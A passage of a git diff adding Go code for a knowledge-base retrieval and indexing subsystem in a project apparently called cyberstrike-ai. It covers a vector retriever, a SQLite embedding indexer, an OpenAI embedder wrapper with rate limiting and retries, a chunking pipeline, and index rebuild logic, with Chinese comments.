strings.TrimSpace(query) + if q == "" { + return nil, fmt.Errorf("查询不能为空") + } + + ro := retriever.GetCommonOptions(nil, opts...) + cfg := h.inner.config + + req := &SearchRequest{Query: q} + + if ro.TopK != nil && *ro.TopK > 0 { + req.TopK = *ro.TopK + } else if cfg != nil && cfg.TopK > 0 { + req.TopK = cfg.TopK + } else { + req.TopK = 5 + } + + req.Threshold = 0 + if ro.DSLInfo != nil { + if rt, ok := ro.DSLInfo[DSLRiskType].(string); ok { + req.RiskType = strings.TrimSpace(rt) + } + if v, ok := ro.DSLInfo[DSLSimilarityThreshold]; ok { + if f, ok2 := DSLNumeric(v); ok2 && f > 0 { + req.Threshold = f + } + } + if sf, ok := ro.DSLInfo[DSLSubIndexFilter].(string); ok { + req.SubIndexFilter = strings.TrimSpace(sf) + } + } + if req.SubIndexFilter == "" && cfg != nil && strings.TrimSpace(cfg.SubIndexFilter) != "" { + req.SubIndexFilter = strings.TrimSpace(cfg.SubIndexFilter) + } + if req.Threshold <= 0 && cfg != nil && cfg.SimilarityThreshold > 0 { + req.Threshold = cfg.SimilarityThreshold + } + if req.Threshold <= 0 { + req.Threshold = 0.7 + } + + finalTopK := req.TopK + var postPO *config.PostRetrieveConfig + if cfg != nil { + postPO = &cfg.PostRetrieve + } + fetchK := EffectivePrefetchTopK(finalTopK, postPO) + searchReq := *req + searchReq.TopK = fetchK + + ctx = callbacks.EnsureRunInfo(ctx, h.GetType(), components.ComponentOfRetriever) + th := req.Threshold + st := &th + ctx = callbacks.OnStart(ctx, &retriever.CallbackInput{ + Query: q, + TopK: finalTopK, + ScoreThreshold: st, + Extra: ro.DSLInfo, + }) + defer func() { + if err != nil { + _ = callbacks.OnError(ctx, err) + return + } + _ = callbacks.OnEnd(ctx, &retriever.CallbackOutput{Docs: out}) + }() + + results, err := h.inner.vectorSearch(ctx, &searchReq) + if err != nil { + return nil, err + } + out = retrievalResultsToDocuments(results) + + if rr := h.inner.documentReranker(); rr != nil && len(out) > 1 { + reranked, rerr := rr.Rerank(ctx, q, out) + if rerr != nil { + if h.inner.logger != nil { + h.inner.logger.Warn("知识检索重排失败,已使用向量序", zap.Error(rerr)) + } + } else if len(reranked) > 0 { + out = reranked + } + } + + tokenModel := "" + if h.inner.embedder != nil { + tokenModel = h.inner.embedder.EmbeddingModelName() + } + out, err = ApplyPostRetrieve(out, postPO, tokenModel, finalTopK) + if err != nil { + return nil, err + } + return out, nil +} + +func retrievalResultsToDocuments(results []*RetrievalResult) []*schema.Document { + out := make([]*schema.Document, 0, len(results)) + for _, res := range results { + if res == nil || res.Chunk == nil || res.Item == nil { + continue + } + d := &schema.Document{ + ID: res.Chunk.ID, + Content: res.Chunk.ChunkText, + MetaData: map[string]any{ + metaKBItemID: res.Item.ID, + metaKBCategory: res.Item.Category, + metaKBTitle: res.Item.Title, + metaKBChunkIndex: res.Chunk.ChunkIndex, + metaSimilarity: res.Similarity, + }, + } + d.WithScore(res.Score) + out = append(out, d) + } + return out +} + +func documentsToRetrievalResults(docs []*schema.Document) ([]*RetrievalResult, error) { + out := make([]*RetrievalResult, 0, len(docs)) + for i, d := range docs { + if d == nil { + continue + } + itemID, err := RequireMetaString(d.MetaData, metaKBItemID) + if err != nil { + return nil, fmt.Errorf("document %d: %w", i, err) + } + cat := MetaLookupString(d.MetaData, metaKBCategory) + title := MetaLookupString(d.MetaData, metaKBTitle) + chunkIdx, err := RequireMetaInt(d.MetaData, metaKBChunkIndex) + if err != nil { + return nil, fmt.Errorf("document %d: %w", i, err) + } + sim, _ := MetaFloat64OK(d.MetaData, metaSimilarity) + item := &KnowledgeItem{ID: itemID, Category: cat, Title: title} + chunk := &KnowledgeChunk{ + ID: d.ID, + ItemID: itemID, + ChunkIndex: chunkIdx, + ChunkText: d.Content, + } + out = append(out, &RetrievalResult{ + Chunk: chunk, + Item: item, + Similarity: sim, + Score: d.Score(), + }) + } + return out, nil +} + +var _ retriever.Retriever = (*VectorEinoRetriever)(nil) diff --git a/knowledge/eino_sqlite_indexer.go b/knowledge/eino_sqlite_indexer.go new file mode 100644 index 00000000..a0bbdcdc --- /dev/null +++ b/knowledge/eino_sqlite_indexer.go @@ -0,0 +1,142 @@ +package knowledge + +import ( + "context" + "database/sql" + "encoding/json" + "fmt" + "strings" + + "github.com/cloudwego/eino/callbacks" + "github.com/cloudwego/eino/components" + "github.com/cloudwego/eino/components/indexer" + "github.com/cloudwego/eino/schema" + "github.com/google/uuid" +) + +// SQLiteIndexer implements [indexer.Indexer] against knowledge_embeddings + existing schema. +type SQLiteIndexer struct { + db *sql.DB + batchSize int + embeddingModel string +} + +// NewSQLiteIndexer returns an indexer that writes chunk rows for one knowledge item per Store call. +// batchSize is the embedding batch size; if <= 0, default 64 is used. +// embeddingModel is persisted per row for retrieval-time consistency checks (may be empty). +func NewSQLiteIndexer(db *sql.DB, batchSize int, embeddingModel string) *SQLiteIndexer { + return &SQLiteIndexer{db: db, batchSize: batchSize, embeddingModel: strings.TrimSpace(embeddingModel)} +} + +// GetType implements eino callback run info. +func (s *SQLiteIndexer) GetType() string { + return "SQLiteKnowledgeIndexer" +} + +// Store embeds documents and inserts rows. Each doc must carry MetaData: +// kb_item_id, kb_category, kb_title, kb_chunk_index (int). Content is chunk text only. +func (s *SQLiteIndexer) Store(ctx context.Context, docs []*schema.Document, opts ...indexer.Option) (ids []string, err error) { + options := indexer.GetCommonOptions(nil, opts...) + if options.Embedding == nil { + return nil, fmt.Errorf("sqlite indexer: embedding is required") + } + if len(docs) == 0 { + return nil, nil + } + + ctx = callbacks.EnsureRunInfo(ctx, s.GetType(), components.ComponentOfIndexer) + ctx = callbacks.OnStart(ctx, &indexer.CallbackInput{Docs: docs}) + defer func() { + if err != nil { + _ = callbacks.OnError(ctx, err) + return + } + _ = callbacks.OnEnd(ctx, &indexer.CallbackOutput{IDs: ids}) + }() + + subIdxStr := strings.Join(options.SubIndexes, ",") + + texts := make([]string, len(docs)) + for i, d := range docs { + if d == nil { + return nil, fmt.Errorf("sqlite indexer: nil document at %d", i) + } + cat := MetaLookupString(d.MetaData, metaKBCategory) + title := MetaLookupString(d.MetaData, metaKBTitle) + texts[i] = FormatEmbeddingInput(cat, title, d.Content) + } + + bs := s.batchSize + if bs <= 0 { + bs = 64 + } + + var allVecs [][]float64 + for start := 0; start < len(texts); start += bs { + end := start + bs + if end > len(texts) { + end = len(texts) + } + batch := texts[start:end] + vecs, embedErr := options.Embedding.EmbedStrings(ctx, batch) + if embedErr != nil { + return nil, fmt.Errorf("sqlite indexer: embed batch %d-%d: %w", start, end, embedErr) + } + if len(vecs) != len(batch) { + return nil, fmt.Errorf("sqlite indexer: embed count mismatch: got %d want %d", len(vecs), len(batch)) + } + allVecs = append(allVecs, vecs...) + } + + embedDim := 0 + if len(allVecs) > 0 { + embedDim = len(allVecs[0]) + } + + tx, err := s.db.BeginTx(ctx, nil) + if err != nil { + return nil, fmt.Errorf("sqlite indexer: begin tx: %w", err) + } + defer tx.Rollback() + + ids = make([]string, 0, len(docs)) + for i, d := range docs { + chunkID := uuid.New().String() + itemID, metaErr := RequireMetaString(d.MetaData, metaKBItemID) + if metaErr != nil { + return nil, fmt.Errorf("sqlite indexer: doc %d: %w", i, metaErr) + } + chunkIdx, metaErr := RequireMetaInt(d.MetaData, metaKBChunkIndex) + if metaErr != nil { + return nil, fmt.Errorf("sqlite indexer: doc %d: %w", i, metaErr) + } + vec := allVecs[i] + if embedDim > 0 && len(vec) != embedDim { + return nil, fmt.Errorf("sqlite indexer: inconsistent embedding dim at doc %d: got %d want %d", i, len(vec), embedDim) + } + vec32 := make([]float32, len(vec)) + for j, v := range vec { + vec32[j] = float32(v) + } + embeddingJSON, jsonErr := json.Marshal(vec32) + if jsonErr != nil { + return nil, fmt.Errorf("sqlite indexer: marshal embedding: %w", jsonErr) + } + _, err = tx.ExecContext(ctx, + `INSERT INTO knowledge_embeddings (id, item_id, chunk_index, chunk_text, embedding, sub_indexes, embedding_model, embedding_dim, created_at) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, datetime('now'))`, + chunkID, itemID, chunkIdx, d.Content, string(embeddingJSON), subIdxStr, s.embeddingModel, embedDim, + ) + if err != nil { + return nil, fmt.Errorf("sqlite indexer: insert chunk %d: %w", i, err) + } + ids = append(ids, chunkID) + } + + if err := tx.Commit(); err != nil { + return nil, fmt.Errorf("sqlite indexer: commit: %w", err) + } + return ids, nil +} + +var _ indexer.Indexer = (*SQLiteIndexer)(nil) diff --git a/knowledge/embedder.go b/knowledge/embedder.go new file mode 100644 index 00000000..d9ce8afa --- /dev/null +++ b/knowledge/embedder.go @@ -0,0 +1,251 @@ +package knowledge + +import ( + "context" + "fmt" + "net/http" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/config" + + einoembedopenai "github.com/cloudwego/eino-ext/components/embedding/openai" + "github.com/cloudwego/eino/components/embedding" + "go.uber.org/zap" + "golang.org/x/time/rate" +) + +// Embedder 使用 CloudWeGo Eino 的 OpenAI Embedding 组件,并保留速率限制与重试。 +type Embedder struct { + eino embedding.Embedder + config *config.KnowledgeConfig + logger *zap.Logger + + rateLimiter *rate.Limiter + rateLimitDelay time.Duration + maxRetries int + retryDelay time.Duration + mu sync.Mutex +} + +// NewEmbedder 基于 Eino eino-ext OpenAI Embedder;openAIConfig 用于在知识库未单独配置 key 时回退 API Key。 +func NewEmbedder(ctx context.Context, cfg *config.KnowledgeConfig, openAIConfig *config.OpenAIConfig, logger *zap.Logger) (*Embedder, error) { + if cfg == nil { + return nil, fmt.Errorf("knowledge config is nil") + } + + var rateLimiter *rate.Limiter + var rateLimitDelay time.Duration + if cfg.Indexing.MaxRPM > 0 { + rpm := cfg.Indexing.MaxRPM + rateLimiter = rate.NewLimiter(rate.Every(time.Minute/time.Duration(rpm)), rpm) + if logger != nil { + logger.Info("知识库索引速率限制已启用", zap.Int("maxRPM", rpm)) + } + } else if cfg.Indexing.RateLimitDelayMs > 0 { + rateLimitDelay = time.Duration(cfg.Indexing.RateLimitDelayMs) * time.Millisecond + if logger != nil { + logger.Info("知识库索引固定延迟已启用", zap.Duration("delay", rateLimitDelay)) + } + } + + maxRetries := 3 + retryDelay := 1000 * time.Millisecond + if cfg.Indexing.MaxRetries > 0 { + maxRetries = cfg.Indexing.MaxRetries + } + if cfg.Indexing.RetryDelayMs > 0 { + retryDelay = time.Duration(cfg.Indexing.RetryDelayMs) * time.Millisecond + } + + model := strings.TrimSpace(cfg.Embedding.Model) + if model == "" { + model = "text-embedding-3-small" + } + + baseURL := strings.TrimSpace(cfg.Embedding.BaseURL) + baseURL = strings.TrimSuffix(baseURL, "/") + if baseURL == "" { + baseURL = "https://api.openai.com/v1" + } + + apiKey := strings.TrimSpace(cfg.Embedding.APIKey) + if apiKey == "" && openAIConfig != nil { + apiKey = strings.TrimSpace(openAIConfig.APIKey) + } + if apiKey == "" { + return nil, fmt.Errorf("embedding API key 未配置") + } + + timeout := 120 * time.Second + if cfg.Indexing.RequestTimeoutSeconds > 0 { + timeout = time.Duration(cfg.Indexing.RequestTimeoutSeconds) * time.Second + } + httpClient := &http.Client{Timeout: timeout} + + inner, err := einoembedopenai.NewEmbedder(ctx, &einoembedopenai.EmbeddingConfig{ + APIKey: apiKey, + BaseURL: baseURL, + ByAzure: false, + Model: model, + HTTPClient: httpClient, + }) + if err != nil { + return nil, fmt.Errorf("eino OpenAI embedder: %w", err) + } + + return &Embedder{ + eino: inner, + config: cfg, + logger: logger, + rateLimiter: rateLimiter, + rateLimitDelay: rateLimitDelay, + maxRetries: maxRetries, + retryDelay: retryDelay, + }, nil +} + +// EmbeddingModelName 返回配置的嵌入模型名(用于 tiktoken 分块与向量行元数据)。 +func (e *Embedder) EmbeddingModelName() string { + if e == nil || e.config == nil { + return "" + } + s := strings.TrimSpace(e.config.Embedding.Model) + if s != "" { + return s + } + return "text-embedding-3-small" +} + +func (e *Embedder) waitRateLimiter() { + e.mu.Lock() + defer e.mu.Unlock() + + if e.rateLimiter != nil { + ctx := context.Background() + if err := e.rateLimiter.Wait(ctx); err != nil && e.logger != nil { + e.logger.Warn("速率限制器等待失败", zap.Error(err)) + } + } + if e.rateLimitDelay > 0 { + time.Sleep(e.rateLimitDelay) + } +} + +// EmbedText 单条嵌入(float32,与历史存储格式一致)。 +func (e *Embedder) EmbedText(ctx context.Context, text string) ([]float32, error) { + vecs, err := e.EmbedStrings(ctx, []string{text}) + if err != nil { + return nil, err + } + if len(vecs) != 1 { + return nil, fmt.Errorf("unexpected embedding count: %d", len(vecs)) + } + return vecs[0], nil +} + +// EmbedStrings 批量嵌入,带重试;实现 [embedding.Embedder],可供 Eino Indexer 使用。 +func (e *Embedder) EmbedStrings(ctx context.Context, texts []string, opts ...embedding.Option) ([][]float32, error) { + if e == nil || e.eino == nil { + return nil, fmt.Errorf("embedder not initialized") + } + if len(texts) == 0 { + return nil, nil + } + + var lastErr error + for attempt := 0; attempt < e.maxRetries; attempt++ { + if attempt > 0 { + wait := e.retryDelay * time.Duration(attempt) + if e.logger != nil { + e.logger.Debug("嵌入重试前等待", zap.Int("attempt", attempt+1), zap.Duration("wait", wait)) + } + select { + case <-ctx.Done(): + return nil, ctx.Err() + case <-time.After(wait): + } + } else { + e.waitRateLimiter() + } + + raw, err := e.eino.EmbedStrings(ctx, texts, opts...) + if err == nil { + out := make([][]float32, len(raw)) + for i, row := range raw { + out[i] = make([]float32, len(row)) + for j, v := range row { + out[i][j] = float32(v) + } + } + return out, nil + } + lastErr = err + if !e.isRetryableError(err) { + return nil, err + } + if e.logger != nil { + e.logger.Debug("嵌入失败,将重试", zap.Int("attempt", attempt+1), zap.Error(err)) + } + } + return nil, fmt.Errorf("达到最大重试次数 (%d): %v", e.maxRetries, lastErr) +} + +// EmbedTexts 批量 float32 嵌入(兼容旧调用;单次请求批量以减小延迟)。 +func (e *Embedder) EmbedTexts(ctx context.Context, texts []string) ([][]float32, error) { + return e.EmbedStrings(ctx, texts) +} + +func (e *Embedder) isRetryableError(err error) bool { + if err == nil { + return false + } + errStr := err.Error() + if strings.Contains(errStr, "429") || strings.Contains(errStr, "rate limit") { + return true + } + if strings.Contains(errStr, "500") || strings.Contains(errStr, "502") || + strings.Contains(errStr, "503") || strings.Contains(errStr, "504") { + return true + } + if strings.Contains(errStr, "timeout") || strings.Contains(errStr, "connection") || + strings.Contains(errStr, "network") || strings.Contains(errStr, "EOF") { + return true + } + return false +} + +// einoFloatEmbedder adapts [][]float32 embedder to Eino's [][]float64 [embedding.Embedder] for Indexer.Store. +type einoFloatEmbedder struct { + inner *Embedder +} + +func (w *einoFloatEmbedder) EmbedStrings(ctx context.Context, texts []string, opts ...embedding.Option) ([][]float64, error) { + vec32, err := w.inner.EmbedStrings(ctx, texts, opts...) + if err != nil { + return nil, err + } + out := make([][]float64, len(vec32)) + for i, row := range vec32 { + out[i] = make([]float64, len(row)) + for j, v := range row { + out[i][j] = float64(v) + } + } + return out, nil +} + +func (w *einoFloatEmbedder) GetType() string { + return "CyberStrikeKnowledgeEmbedder" +} + +func (w *einoFloatEmbedder) IsCallbacksEnabled() bool { + return false +} + +// EinoEmbeddingComponent returns an [embedding.Embedder] that uses the same retry/rate-limit path +// and produces float64 vectors expected by generic Eino indexer helpers. +func (e *Embedder) EinoEmbeddingComponent() embedding.Embedder { + return &einoFloatEmbedder{inner: e} +} diff --git a/knowledge/index_pipeline.go b/knowledge/index_pipeline.go new file mode 100644 index 00000000..a9b9a4c4 --- /dev/null +++ b/knowledge/index_pipeline.go @@ -0,0 +1,91 @@ +package knowledge + +import ( + "context" + "database/sql" + "fmt" + "strings" + + "cyberstrike-ai/internal/config" + + "github.com/cloudwego/eino/components/document" + "github.com/cloudwego/eino/compose" + "github.com/cloudwego/eino/schema" +) + +// normalizeChunkStrategy returns "recursive" or "markdown_then_recursive". +func normalizeChunkStrategy(s string) string { + v := strings.TrimSpace(strings.ToLower(s)) + switch v { + case "recursive": + return "recursive" + case "markdown_then_recursive", "markdown_recursive", "markdown": + return "markdown_then_recursive" + case "": + return "markdown_then_recursive" + default: + return "markdown_then_recursive" + } +} + +func buildKnowledgeIndexChain( + ctx context.Context, + indexingCfg *config.IndexingConfig, + db *sql.DB, + recursive document.Transformer, + embeddingModel string, +) (compose.Runnable[[]*schema.Document, []string], error) { + if recursive == nil { + return nil, fmt.Errorf("recursive transformer is nil") + } + if db == nil { + return nil, fmt.Errorf("db is nil") + } + strategy := normalizeChunkStrategy("markdown_then_recursive") + batch := 64 + maxChunks := 0 + if indexingCfg != nil { + strategy = normalizeChunkStrategy(indexingCfg.ChunkStrategy) + if indexingCfg.BatchSize > 0 { + batch = indexingCfg.BatchSize + } + maxChunks = indexingCfg.MaxChunksPerItem + } + + si := NewSQLiteIndexer(db, batch, embeddingModel) + ch := compose.NewChain[[]*schema.Document, []string]() + if strategy != "recursive" { + md, err := newMarkdownHeaderSplitter(ctx) + if err != nil { + return nil, fmt.Errorf("markdown splitter: %w", err) + } + ch.AppendDocumentTransformer(md) + } + ch.AppendDocumentTransformer(recursive) + ch.AppendLambda(newChunkEnrichLambda(maxChunks)) + ch.AppendIndexer(si) + return ch.Compile(ctx) +} + +func newChunkEnrichLambda(maxChunks int) *compose.Lambda { + return compose.InvokableLambda(func(ctx context.Context, docs []*schema.Document) ([]*schema.Document, error) { + _ = ctx + out := make([]*schema.Document, 0, len(docs)) + for _, d := range docs { + if d == nil || strings.TrimSpace(d.Content) == "" { + continue + } + out = append(out, d) + } + if maxChunks > 0 && len(out) > maxChunks { + out = out[:maxChunks] + } + for i, d := range out { + if d.MetaData == nil { + d.MetaData = make(map[string]any) + } + d.MetaData[metaKBChunkIndex] = i + } + return out, nil + }) +} diff --git a/knowledge/index_pipeline_test.go b/knowledge/index_pipeline_test.go new file mode 100644 index 00000000..9e4b03fa --- /dev/null +++ b/knowledge/index_pipeline_test.go @@ -0,0 +1,21 @@ +package knowledge + +import "testing" + +func TestNormalizeChunkStrategy(t *testing.T) { + cases := []struct { + in, want string + }{ + {"", "markdown_then_recursive"}, + {"recursive", "recursive"}, + {"RECURSIVE", "recursive"}, + {"markdown_then_recursive", "markdown_then_recursive"}, + {"markdown", "markdown_then_recursive"}, + {"unknown", "markdown_then_recursive"}, + } + for _, tc := range cases { + if got := normalizeChunkStrategy(tc.in); got != tc.want { + t.Errorf("normalizeChunkStrategy(%q) = %q, want %q", tc.in, got, tc.want) + } + } +} diff --git a/knowledge/indexer.go b/knowledge/indexer.go new file mode 100644 index 00000000..aeb6b9ff --- /dev/null +++ b/knowledge/indexer.go @@ -0,0 +1,352 @@ +package knowledge + +import ( + "context" + "database/sql" + "fmt" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/config" + + fileloader "github.com/cloudwego/eino-ext/components/document/loader/file" + "github.com/cloudwego/eino/components/document" + "github.com/cloudwego/eino/components/indexer" + "github.com/cloudwego/eino/compose" + "github.com/cloudwego/eino/schema" + "go.uber.org/zap" +) + +// Indexer 使用 Eino Compose 索引链(Markdown/递归分块、Lambda enrich、SQLite 索引)与嵌入写入。 +type Indexer struct { + db *sql.DB + embedder *Embedder + logger *zap.Logger + chunkSize int + overlap int + indexingCfg *config.IndexingConfig + + indexChain compose.Runnable[[]*schema.Document, []string] + fileLoader *fileloader.FileLoader + + mu sync.RWMutex + lastError string + lastErrorTime time.Time + errorCount int + + rebuildMu sync.RWMutex + isRebuilding bool + rebuildTotalItems int + rebuildCurrent int + rebuildFailed int + rebuildStartTime time.Time + rebuildLastItemID string + rebuildLastChunks int +} + +// NewIndexer 创建索引器并编译 Eino 索引链;kcfg 为完整知识库配置(含 indexing 与路径相关行为)。 +func NewIndexer(ctx context.Context, db *sql.DB, embedder *Embedder, logger *zap.Logger, kcfg *config.KnowledgeConfig) (*Indexer, error) { + if db == nil { + return nil, fmt.Errorf("db is nil") + } + if embedder == nil { + return nil, fmt.Errorf("embedder is nil") + } + if err := EnsureKnowledgeEmbeddingsSchema(db); err != nil { + return nil, fmt.Errorf("knowledge_embeddings 结构迁移: %w", err) + } + if kcfg == nil { + kcfg = &config.KnowledgeConfig{} + } + indexingCfg := &kcfg.Indexing + + chunkSize := 512 + overlap := 50 + if indexingCfg.ChunkSize > 0 { + chunkSize = indexingCfg.ChunkSize + } + if indexingCfg.ChunkOverlap >= 0 { + overlap = indexingCfg.ChunkOverlap + } + + embedModel := embedder.EmbeddingModelName() + splitter, err := newKnowledgeSplitter(chunkSize, overlap, embedModel) + if err != nil { + return nil, fmt.Errorf("eino recursive splitter: %w", err) + } + + chain, err := buildKnowledgeIndexChain(ctx, indexingCfg, db, splitter, embedModel) + if err != nil { + return nil, fmt.Errorf("knowledge index chain: %w", err) + } + + var fl *fileloader.FileLoader + fl, err = fileloader.NewFileLoader(ctx, nil) + if err != nil { + if logger != nil { + logger.Warn("Eino FileLoader 初始化失败,prefer_source_file 将回退数据库正文", zap.Error(err)) + } + fl = nil + err = nil + } + + return &Indexer{ + db: db, + embedder: embedder, + logger: logger, + chunkSize: chunkSize, + overlap: overlap, + indexingCfg: indexingCfg, + indexChain: chain, + fileLoader: fl, + }, nil +} + +// RecompileIndexChain 在配置或嵌入模型变更后重建 Eino 索引链(无需重启进程)。 +func (idx *Indexer) RecompileIndexChain(ctx context.Context) error { + if idx == nil || idx.db == nil || idx.embedder == nil { + return fmt.Errorf("indexer 未初始化") + } + if err := EnsureKnowledgeEmbeddingsSchema(idx.db); err != nil { + return err + } + embedModel := idx.embedder.EmbeddingModelName() + splitter, err := newKnowledgeSplitter(idx.chunkSize, idx.overlap, embedModel) + if err != nil { + return fmt.Errorf("eino recursive splitter: %w", err) + } + chain, err := buildKnowledgeIndexChain(ctx, idx.indexingCfg, idx.db, splitter, embedModel) + if err != nil { + return fmt.Errorf("knowledge index chain: %w", err) + } + idx.indexChain = chain + return nil +} + +// IndexItem 索引单个知识项:先清空旧向量,再走 Compose 链(分块、嵌入、写入)。 +func (idx *Indexer) IndexItem(ctx context.Context, itemID string) error { + if idx.indexChain == nil { + return fmt.Errorf("索引链未初始化") + } + if idx.embedder == nil { + return fmt.Errorf("嵌入器未初始化") + } + + var content, category, title, filePath string + err := idx.db.QueryRow("SELECT content, category, title, file_path FROM knowledge_base_items WHERE id = ?", itemID).Scan(&content, &category, &title, &filePath) + if err != nil { + return fmt.Errorf("获取知识项失败:%w", err) + } + + if _, err := idx.db.Exec("DELETE FROM knowledge_embeddings WHERE item_id = ?", itemID); err != nil { + return fmt.Errorf("删除旧向量失败:%w", err) + } + + body := strings.TrimSpace(content) + if idx.indexingCfg != nil && idx.indexingCfg.PreferSourceFile && strings.TrimSpace(filePath) != "" && idx.fileLoader != nil { + docs, lerr := idx.fileLoader.Load(ctx, document.Source{URI: strings.TrimSpace(filePath)}) + if lerr == nil && len(docs) > 0 { + var b strings.Builder + for i, d := range docs { + if d == nil { + continue + } + if i > 0 { + b.WriteString("\n\n") + } + b.WriteString(d.Content) + } + if s := strings.TrimSpace(b.String()); s != "" { + body = s + } + } else if idx.logger != nil { + idx.logger.Warn("优先源文件读取失败,使用数据库正文", + zap.String("itemId", itemID), + zap.String("path", filePath), + zap.Error(lerr)) + } + } + + root := &schema.Document{ + ID: itemID, + Content: body, + MetaData: map[string]any{ + metaKBCategory: category, + metaKBTitle: title, + metaKBItemID: itemID, + }, + } + + idxOpts := []indexer.Option{indexer.WithEmbedding(idx.embedder.EinoEmbeddingComponent())} + if idx.indexingCfg != nil && len(idx.indexingCfg.SubIndexes) > 0 { + idxOpts = append(idxOpts, indexer.WithSubIndexes(idx.indexingCfg.SubIndexes)) + } + + ids, err := idx.indexChain.Invoke(ctx, []*schema.Document{root}, compose.WithIndexerOption(idxOpts...)) + if err != nil { + msg := fmt.Sprintf("索引写入失败 (知识项:%s): %v", itemID, err) + idx.mu.Lock() + idx.lastError = msg + idx.lastErrorTime = time.Now() + idx.mu.Unlock() + return err + } + + if idx.logger != nil { + idx.logger.Info("知识项索引完成", zap.String("itemId", itemID), zap.Int("chunks", len(ids))) + } + idx.rebuildMu.Lock() + idx.rebuildLastItemID = itemID + idx.rebuildLastChunks = len(ids) + idx.rebuildMu.Unlock() + return nil +} + +// HasIndex 检查是否存在索引 +func (idx *Indexer) HasIndex() (bool, error) { + var count int + err := idx.db.QueryRow("SELECT COUNT(*) FROM knowledge_embeddings").Scan(&count) + if err != nil { + return false, fmt.Errorf("检查索引失败:%w", err) + } + return count > 0, nil +} + +// RebuildIndex 重建所有索引 +func (idx *Indexer) RebuildIndex(ctx context.Context) error { + idx.rebuildMu.Lock() + idx.isRebuilding = true + idx.rebuildTotalItems = 0 + idx.rebuildCurrent = 0 + idx.rebuildFailed = 0 + idx.rebuildStartTime = time.Now() + idx.rebuildLastItemID = "" + idx.rebuildLastChunks = 0 + idx.rebuildMu.Unlock() + + idx.mu.Lock() + idx.lastError = "" + idx.lastErrorTime = time.Time{} + idx.errorCount = 0 + idx.mu.Unlock() + + rows, err := idx.db.Query("SELECT id FROM knowledge_base_items") + if err != nil { + idx.rebuildMu.Lock() + idx.isRebuilding = false + idx.rebuildMu.Unlock() + return fmt.Errorf("查询知识项失败:%w", err) + } + defer rows.Close() + + var itemIDs []string + for rows.Next() { + var id string + if err := rows.Scan(&id); err != nil { + idx.rebuildMu.Lock() + idx.isRebuilding = false + idx.rebuildMu.Unlock() + return fmt.Errorf("扫描知识项 ID 失败:%w", err) + } + itemIDs = append(itemIDs, id) + } + + idx.rebuildMu.Lock() + idx.rebuildTotalItems = len(itemIDs) + idx.rebuildMu.Unlock() + + idx.logger.Info("开始重建索引", zap.Int("totalItems", len(itemIDs))) + + failedCount := 0 + consecutiveFailures := 0 + maxConsecutiveFailures := 5 + firstFailureItemID := "" + var firstFailureError error + + for i, itemID := range itemIDs { + if err := idx.IndexItem(ctx, itemID); err != nil { + failedCount++ + consecutiveFailures++ + + if consecutiveFailures == 1 { + firstFailureItemID = itemID + firstFailureError = err + idx.logger.Warn("索引知识项失败", + zap.String("itemId", itemID), + zap.Int("totalItems", len(itemIDs)), + zap.Error(err), + ) + } + + if consecutiveFailures >= maxConsecutiveFailures { + errorMsg := fmt.Sprintf("连续 %d 个知识项索引失败,可能存在配置问题(如嵌入模型配置错误、API 密钥无效、余额不足等)。第一个失败项:%s, 错误:%v", consecutiveFailures, firstFailureItemID, firstFailureError) + idx.mu.Lock() + idx.lastError = errorMsg + idx.lastErrorTime = time.Now() + idx.mu.Unlock() + + idx.logger.Error("连续索引失败次数过多,立即停止索引", + zap.Int("consecutiveFailures", consecutiveFailures), + zap.Int("totalItems", len(itemIDs)), + zap.Int("processedItems", i+1), + zap.String("firstFailureItemId", firstFailureItemID), + zap.Error(firstFailureError), + ) + return fmt.Errorf("连续索引失败次数过多:%v", firstFailureError) + } + + if failedCount > len(itemIDs)*3/10 && failedCount == len(itemIDs)*3/10+1 { + errorMsg := fmt.Sprintf("索引失败的知识项过多 (%d/%d),可能存在配置问题。第一个失败项:%s, 错误:%v", failedCount, len(itemIDs), firstFailureItemID, firstFailureError) + idx.mu.Lock() + idx.lastError = errorMsg + idx.lastErrorTime = time.Now() + idx.mu.Unlock() + + idx.logger.Error("索引失败的知识项过多,可能存在配置问题", + zap.Int("failedCount", failedCount), + zap.Int("totalItems", len(itemIDs)), + zap.String("firstFailureItemId", firstFailureItemID), + zap.Error(firstFailureError), + ) + } + continue + } + + if consecutiveFailures > 0 { + consecutiveFailures = 0 + firstFailureItemID = "" + firstFailureError = nil + } + + idx.rebuildMu.Lock() + idx.rebuildCurrent = i + 1 + idx.rebuildFailed = failedCount + idx.rebuildMu.Unlock() + + if (i+1)%10 == 0 || (len(itemIDs) > 0 && (i+1)*100/len(itemIDs)%10 == 0 && (i+1)*100/len(itemIDs) > 0) { + idx.logger.Info("索引进度", zap.Int("current", i+1), zap.Int("total", len(itemIDs)), zap.Int("failed", failedCount)) + } + } + + idx.rebuildMu.Lock() + idx.isRebuilding = false + idx.rebuildMu.Unlock() + + idx.logger.Info("索引重建完成", zap.Int("totalItems", len(itemIDs)), zap.Int("failedCount", failedCount)) + return nil +} + +// GetLastError 获取最近一次错误信息 +func (idx *Indexer) GetLastError() (string, time.Time) { + idx.mu.RLock() + defer idx.mu.RUnlock() + return idx.lastError, idx.lastErrorTime +} + +// GetRebuildStatus 获取重建索引状态 +func (idx *Indexer) GetRebuildStatus() (isRebuilding bool, totalItems int, current int, failed int, lastItemID string, lastChunks int, startTime time.Time) { + idx.rebuildMu.RLock() + defer idx.rebuildMu.RUnlock() + return idx.isRebuilding, idx.rebuildTotalItems, idx.rebuildCurrent, idx.rebuildFailed, idx.rebuildLastItemID, idx.rebuildLastChunks, idx.rebuildStartTime +} diff --git a/knowledge/manager.go b/knowledge/manager.go new file mode 100644 index 00000000..7309cc2a --- /dev/null +++ b/knowledge/manager.go @@ -0,0 +1,885 @@ +package knowledge + +import ( + "database/sql" + "encoding/json" + "fmt" + "io/fs" + "os" + "path/filepath" + "strings" + "time" + + "github.com/google/uuid" + "go.uber.org/zap" +) + +// Manager 知识库管理器 +type Manager struct { + db *sql.DB + basePath string + logger *zap.Logger +} + +// NewManager 创建新的知识库管理器 +func NewManager(db *sql.DB, basePath string, logger *zap.Logger) *Manager { + return &Manager{ + db: db, + basePath: basePath, + logger: logger, + } +} + +// ScanKnowledgeBase 扫描知识库目录,更新数据库 +// 返回需要索引的知识项ID列表(新添加的或更新的) +func (m *Manager) ScanKnowledgeBase() ([]string, error) { + if m.basePath == "" { + return nil, fmt.Errorf("知识库路径未配置") + } + + // 确保目录存在 + if err := os.MkdirAll(m.basePath, 0755); err != nil { + return nil, fmt.Errorf("创建知识库目录失败: %w", err) + } + + var itemsToIndex []string + + // 